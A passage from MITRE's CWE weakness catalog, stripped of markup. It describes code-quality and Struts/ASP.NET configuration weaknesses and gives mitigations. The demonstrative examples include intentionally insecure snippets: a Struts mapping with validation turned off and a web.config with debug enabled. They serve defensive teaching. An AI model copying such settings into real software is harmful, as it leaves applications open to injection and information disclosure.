perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-5 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The implementation of the product is not consistent with the - design as described within the relevant documentation. - This issue makes it more difficult to maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Implementation - - - Architecture and Design - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - An invokable code block contains an exception handling block that does not contain any code, i.e. is empty. - When an exception handling block (such as a Catch and Finally block) is used, but that block is empty, this can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-1 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - - - An unused validation form indicates that validation logic is not up-to-date. - It is easy for developers to forget to update validation logic when they remove or rename action form mappings. One indication that validation logic is not being properly maintained is the presence of an unused validation form. - - - - - - - Resultant - - - - - - - - Implementation - - - Operation - - - - - Other - Quality Degradation - - - - - Implementation - Remove the unused Validation Form from the validation.xml file. - - - - - In the following example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml. - - public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { - - - - // private variables for registration form - private String name;private String address;private String city;private String state;private String zipcode; - // no longer using the phone form field - - - // private String phone; - private String email; - public RegistrationForm() {super();} - - // getter and setter methods for private variables - ... - } - - - <form-validation> - <formset> - <form name="RegistrationForm"> - <field property="name" depends="required"><arg position="0" key="prompt.name"/></field><field property="address" depends="required"><arg position="0" key="prompt.address"/></field><field property="city" depends="required"><arg position="0" key="prompt.city"/></field><field property="state" depends="required,mask"><arg position="0" key="prompt.state"/><var><var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value></var></field><field property="zipcode" depends="required,mask"><arg position="0" key="prompt.zipcode"/><var><var-name>mask</var-name><var-value>\d{5}</var-value></var></field><field property="phone" depends="required,mask"><arg position="0" key="prompt.phone"/><var><var-name>mask</var-name><var-value>^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$</var-value></var></field><field property="email" depends="required,email"><arg position="0" key="prompt.email"/></field> - </form> - </formset> - </form-validation> - - However, the validator XML file, validator.xml, for the RegistrationForm class includes the validation form for the user input form field "phone" that is no longer used by the input form and the RegistrationForm class. Any validation forms that are no longer required should be removed from the validator XML file, validator.xml. - The existence of unused forms may be an indication to attackers that this code is out of date or poorly maintained. - - - - - Struts: Unused Validation Form - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The software contains a serializable, storable data element such as a field or member, - but the data element contains member elements that are not - serializable. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java. - - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-3 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The source code contains a block that does not contain any code, i.e., the block is empty. - Empty code blocks can occur in the bodies of conditionals, function or method definitions, exception handlers, etc. While an empty code block might be intentional, it might also indicate incomplete implementation, accidental code deletion, unexpected macro expansion, etc. For some programming languages and constructs, an empty block might be allowed by the syntax, but the lack of any behavior within the block might violate a convention or API in such a way that it is an error. - - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - CWE Content Team - MITRE - 2019-01-02 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - - - The software accesses a data resource through a database without using a - connection pooling capability. - This issue can make the software perform more slowly, as connection pools allow connections to be reused without the overhead and time consumption of opening and closing a new connection. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-13 - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities. - This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - While the interpretation of "large number of data accesses/queries" may vary for each product or developer, CISQ recommends a default maximum of 2 data accesses per function/method. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-10 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A class has an inheritance level that is too high, i.e., it - has a large number of parent classes. - This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - While the interpretation of "large number of parent classes" may vary for each product or developer, CISQ recommends a default maximum of 7 parent classes. - - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-17 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software performs unconditional control transfer (such as a - "goto") in code outside of a branching structure such as a switch - block. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-1 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The product's architecture, source code, design, documentation, - or other artifact does not follow required conventions. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code performs a comparison such as an - equality test between two float (floating point) values, but - it uses comparison operators that do not account for the - possibility of loss of precision. - - Numeric calculation using floating point values - can generate imprecise results because of rounding errors. - As a result, two different calculations might generate - numbers that are mathematically equal, but have slightly - different bit representations that do not translate to the - same mathematically-equal values. As a result, an equality - test or other comparison might produce unexpected - results. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-9 - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The source code does not follow - desired style or formatting for indentation, white - space, comments, etc. - - - - - - Indirect - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - A parent class contains one or more child classes, but the parent class does not have a virtual destructor method. - This issue can prevent the software from running reliably due to undefined or unexpected behaviors. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-16 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Every Action Form must have a corresponding validation form. - If a Struts Action Form Mapping specifies a form, it must have a validation form defined under the Struts Validator. - - - - - - - Primary - - - - - - - - Implementation - - - - - Other - Other - If an action form mapping does not have a validation form defined, it may be vulnerable to a number of attacks that rely on unchecked input. Unchecked input is the root cause of some of today's worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation. - - - Confidentiality - Integrity - Availability - Other - Other - Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. - - - - - Implementation - Input Validation - - Map every Action Form to a corresponding validation form. - An action or a form may perform validation in other ways, but the Struts Validator provides an excellent way to verify that all input receives at least a basic level of validation. Without this approach, it is difficult, and often impossible, to establish with a high level of confidence that all input is validated. - - - - - - Struts: Unvalidated Action Form - - - SFP24 - Tainted input to command - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Common_Consequences, Description, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - A source code file has too many lines of - code. - This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - While the interpretation of "too many lines of code" may vary for each product or developer, CISQ recommends a default threshold value of 1000. - - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-8 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The code contains a class instance that calls the method or function to delete or destroy itself. - For example, in C++, "delete this" will cause the object to delete itself. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-7 - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component. - When the software has a data access component, the design may be intended to handle all data access operations through that component. If a data access operation is performed outside of that component, then this may indicate a violation of the intended design. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-10 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A function or method contains too many - operations that utilize a data manager or file resource. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - While the interpretation of "too many operations" may vary for each product or developer, CISQ recommends a default maximum of 7 operations for the same data manager or file. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-14 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A function, method, procedure, etc. contains an excessive amount of code that has been - commented out within its body. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - While the interpretation of "excessive volume" may vary for each product or developer, CISQ recommends a default threshold of 2% of commented code. - - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-6 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A class contains an unnecessarily large number of - children. - This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - While the interpretation of "large number of children" may vary for each product or developer, CISQ recommends a default maximum of 10 child classes. - - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-18 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - A class contains a virtual method, but the method does not have an associated virtual destructor. - This issue can prevent the software from running reliably, e.g. due to undefined behavior. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-15 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite. - This issue can prevent the software from running reliably, since an outage for the remote resource can cause the software to hang. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-19 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software uses a large data table that contains an excessively large number of - indices. - This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - While the interpretation of "large data table" and "excessively large number of indices" may vary for each product or developer, CISQ recommends a default threshold of 1000000 rows for a "large" table and a default threshold of 3 indices. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-6 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation. - - - - - - - Primary - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - Ensure that an action form mapping enables validation. Set the validate field to true. - - - - - This mapping defines an action for a download form: - - <action path="/download"type="com.website.d2.action.DownloadAction"name="downloadForm"scope="request"input=".download"validate="false"></action> - - This mapping has disabled validation. Disabling validation exposes this action to numerous types of attacks. - - - - - Struts: Validator Turned Off - - - SFP24 - Tainted input to command - - - - - - - The Action Form mapping in the demonstrative example disables the form's validate() method. The Struts bean: write tag automatically encodes special HTML characters, replacing a < with "&lt;" and a > with "&gt;". This action can be disabled by specifying filter="false" as an attribute of the tag to disable specified JSP pages. However, being disabled makes these pages susceptible to cross-site scripting attacks. An attacker may be able to insert malicious scripts as user input to write to these JSP pages. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - A method for a class performs an operation that directly - accesses a member element from another class. - This issue suggests poor encapsulation and makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-16 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software contains a method that accesses an object but does not later invoke - the element's associated finalize/destructor method. - This issue can make the software perform more slowly by retaining memory and/or other resources longer than necessary. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-15 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software uses the same control element across multiple - architectural layers. - This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-10 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - The software uses an unnecessarily complex internal representation for its data structures or interrelationships between those structures. - This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - Other - Reduce Performance - - - - - CWE Content Team - MITRE - 2018-07-29 - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software contains an index range scan for a large data table, - but the scan can cover a large number of rows. - This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - While the interpretation of "large data table" and "excessive index range" may vary for each product or developer, CISQ recommends a threshold of 1000000 table rows and a threshold of 10 for the index range. - - - - - - Indirect - - - - - Other - Reduce Performance - - - - - ASCPEM-PRF-7 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software uses a loop with a control flow condition based on - a value that is updated within the body of the loop. - This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - ASCMM-MNT-5 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The software implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once. - This issue can prevent the software from running reliably, e.g. by making the instantiation process non-thread-safe and introducing deadlock (CWE-833) or livelock conditions. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-12 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software uses a storable data element that does not have - all of the associated functions or methods that are necessary to support - comparison. - For example, with Java, a class that is made persistent requires both hashCode() and equals() methods to be defined. -This issue can prevent the software from running reliably, due to incorrect or unexpected comparison results. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-4 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The code contains a data element with a pointer that does not have an associated copy or constructor method. - This issue can prevent the software from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Reliability - - - - - ASCRM-RLB-6 - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - - - The product's code, documentation, or other artifacts do not - consistently use the same naming conventions for variables, callables, groups of - related callables, I/O capabilities, data types, file names, or similar types of - elements. - This issue makes it more difficult to understand and/or maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Debugging messages help attackers learn about the system and plan a form of attack. - ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production. - - - - - - - - The debug attribute of the <compilation> tag defines whether compiled binaries should include debugging information. The use of debug binaries causes an application to provide as much information about itself as possible to the user. - - - - Implementation - - - Build and Compilation - - - - - Confidentiality - Read Application Data - Attackers can leverage the additional information they gain from debugging output to mount attacks targeted on the framework, database, or other resources used by the application. - - - - - System Configuration - Avoid releasing debug binaries into the production environment. Change the debug mode to false when the application is deployed into production. - - - - - The file web.config contains the debug mode setting. Setting debug to "true" will let the browser display debugging information. - - <?xml version="1.0" encoding="utf-8" ?><configuration><system.web><compilationdefaultLanguage="c#"debug="true"/>...</system.web></configuration> - - Change the debug mode to false when the application is deployed into production. - - - - - ASP.NET Misconfiguration: Creating Debug Binary - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Time_of_Introduction - - - - - Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date. - - It is easy for developers to forget to update validation logic when they make changes to an ActionForm class. One indication that validation logic is not being properly maintained is inconsistencies between the action form and the validation form. - Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. - - - - - - - - Primary - - - - - - - - Implementation - - - Operation - - - - - Other - Other - It is critically important that validation logic be maintained and kept in sync with the rest of the application. Unchecked input is the root cause of some of today's worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation. - - - - - Automated Static Analysis - To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files. - Moderate - - - Manual Static Analysis - To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files. - Moderate - - - - - This example shows an inconsistency between an action form and a validation form. with a third field. - This first block of code shows an action form that has two fields, startDate and endDate. - - public class DateRangeForm extends ValidatorForm { - String startDate, endDate; - public void setStartDate(String startDate) {this.startDate = startDate;} - public void setEndDate(String endDate) {this.endDate = endDate;} - } - - This second block of related code shows a validation form with a third field: scale. The presence of the third field suggests that DateRangeForm was modified without taking validation into account. - - <form name="DateRangeForm"><field property="startDate" depends="date"><arg0 key="start.date"/></field><field property="endDate" depends="date"><arg0 key="end.date"/></field><field property="scale" depends="integer"><arg0 key="range.scale"/></field></form> - - - - - - Struts: Validator Without Form Field - - - SFP24 - Tainted input to command - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Common_Consequences, Description, Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The product or code does not isolate system-dependent - functionality into separate standalone modules. - This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product uses automatically-generated code that cannot be - executed without a specific runtime support component. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - The code uses a data representation that relies on low-level - data representation or constructs that may vary across different processors, - physical machines, OSes, or other physical components. - This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - 